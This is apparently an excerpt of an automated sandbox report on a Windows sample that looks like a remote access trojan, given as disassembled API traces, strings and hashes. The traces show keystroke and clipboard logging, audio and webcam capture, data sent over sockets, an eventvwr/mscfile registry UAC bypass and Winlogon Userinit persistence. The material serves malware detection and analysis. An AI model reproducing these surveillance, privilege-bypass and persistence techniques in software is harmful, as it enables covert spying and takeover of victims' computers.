                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                              • waveInUnprepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401A9C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00401AA7
                              • waveInPrepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401ADB
                              • waveInAddBuffer.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401AEA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00000000), ref: 00401AF4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$D@std@@@std@@$V12@V?$allocator@$?write@?$basic_ostream@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@wave$??0?$basic_string@?c_str@?$basic_string@D@1@@HeaderV10@$??0?$basic_fstream@??4?$basic_string@?seekp@?$basic_ostream@BufferPrepareUnprepareV01@V01@@V10@0@W4seekdir@ios_base@2@@localtimeputsstrftimetime
                              • String ID: %Y-%m-%d %H.%M$.wav
                              • API String ID: 866339126-3597965672
                              • Opcode ID: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                              • Instruction ID: a5d7e3b402908acd5397dec8a66d2258045444051812afed8a23243a24f6b54c
                              • Opcode Fuzzy Hash: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                              • Instruction Fuzzy Hash: 3431AA71D40209FFDB51DBA0EC4DADE7B78EB44305F448476F609E21A0EBB49589CB58
                              Function 00404E5F Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108C8,?,00000000,?,753DC0D0,?), ref: 00404E88
                              • toupper.MSVCRT ref: 00404E97
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00404EAB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00404EB6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ED2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDB
                              • toupper.MSVCRT ref: 00404F6E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404EC0
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404EE4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F0E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F18
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F2A
                              • tolower.MSVCRT ref: 00404F47
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00404FCC
                              Strings
                              • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00404F08
                              • [End of clipboard text], xrefs: 00404EF9
                              • [Ctrl + , xrefs: 00404EA3
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                              • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                              • API String ID: 1567161615-221715050
                              • Opcode ID: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                              • Instruction ID: 0a172b601888657c7187d64dec92691b116b1295abc4ce990af629de97d6fe53
                              • Opcode Fuzzy Hash: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                              • Instruction Fuzzy Hash: 5641E7B1904209BFDB14E7E4DD499EE7B78EB40300F10447BF502A2191DA789F498759
                              Function 00402504 Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 74networkCOMMON
                              Download Yara Rule
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                              • send.WS2_32(?,00000000), ref: 00402584
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                              • send.WS2_32(?,00000000), ref: 004025C8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@?length@?$basic_string@$?data@?$basic_string@send$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V01@@V10@0@V?$basic_string@
                              • String ID: [DataStart]0000
                              • API String ID: 4073614965-1609390111
                              • Opcode ID: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                              • Instruction ID: da84d689751dc417b3d6efdffba69dc45be3ba0d0bf169ed1abd597d19f590f1
                              • Opcode Fuzzy Hash: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                              • Instruction Fuzzy Hash: 7D21EC72500009AFCB04EFA0DD5D9EE7B78EB58345B0041B5F906E61A0DFB49E89CBA9
                              Function 0040612A Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 102COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040613D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040614C
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040616C
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,fundlldata), ref: 00406181
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00406199
                                • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 0040530E
                                • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,00415988,00000000,FunFunc), ref: 004061E0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,?,00415988,00000000,FunFunc), ref: 004061EA
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 004061FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 00406206
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,funfunc), ref: 00406217
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040622B
                              • atoi.MSVCRT ref: 00406232
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406244
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406255
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?length@?$basic_string@$?c_str@?$basic_string@D@2@@0@V?$basic_string@$G@2@@std@@G@std@@$??8std@@D@1@@FileHstd@@V12@$??4?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateHandleMappingV01@V10@0@V10@@Viewatoi
                              • String ID: FunFunc$fundlldata$funfunc$funready
                              • API String ID: 298526877-738133096
                              • Opcode ID: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                              • Instruction ID: a804b9d79a05e482a7dd7459e5937299dff8fe1282dbbe2cbe30763dd8b13e0d
                              • Opcode Fuzzy Hash: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                              • Instruction Fuzzy Hash: BA313071900219ABCF04ABE1EC4E9EE7738FF45315B00447AF902B21D1DEB899948B59
                              Function 00401F3A Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • _EH_prolog.MSVCRT ref: 00401F3F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401F79
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415268,?,00415268,004151F0), ref: 00401FA0
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,camframe,00415268,00000000), ref: 00401FBD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401FCA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401FD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401FE4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FF4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401FFE
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402014
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040201D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402026
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040202F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402038
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402041
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040204A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@V10@@_itoa
                              • String ID: camframe
                              • API String ID: 870949895-3510102068
                              • Opcode ID: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                              • Instruction ID: abce0e248e8dab4f9b6b1d1c922dc1d07b2fbcfaebd547229da4bc85d70ff786
                              • Opcode Fuzzy Hash: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                              • Instruction Fuzzy Hash: FA313C72D0001DABCB04EBA0ED4A9EEBB78FB55315F14407AF506B2091EB795A58CB68
                              Function 00402A78 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?), ref: 00402AF7
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                              • exit.MSVCRT ref: 00402B3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??0?$basic_string@??1?$basic_string@$D@1@@$?length@?$basic_string@CloseValue$?size@?$basic_string@CreateExecuteOpenQueryShellV01@@exit
                              • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                              • API String ID: 467877216-3923289169
                              • Opcode ID: 56364ce5dc0bd69dc0860c4d4b49545843bc445eebc56450cb0bdaa2adb7e3ee
                              • Instruction ID: 983c3f54951dff303221dc85f48cadd06facc0e56af3ae634be6270d9a423c28
                              • Opcode Fuzzy Hash: 56364ce5dc0bd69dc0860c4d4b49545843bc445eebc56450cb0bdaa2adb7e3ee
